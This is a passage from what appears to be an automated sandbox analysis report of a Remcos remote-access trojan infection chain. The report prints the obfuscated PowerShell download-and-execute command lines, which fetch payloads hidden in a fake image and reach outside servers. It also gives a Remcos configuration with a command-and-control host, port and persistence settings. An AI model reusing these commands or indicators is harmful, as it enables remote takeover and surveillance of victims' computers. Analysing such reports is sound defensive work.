? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 2848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 3024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 1960 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1704 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2640 cmdline: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3580 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3588 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3844 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 4092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "cloudsave.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CJ3HJ1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", 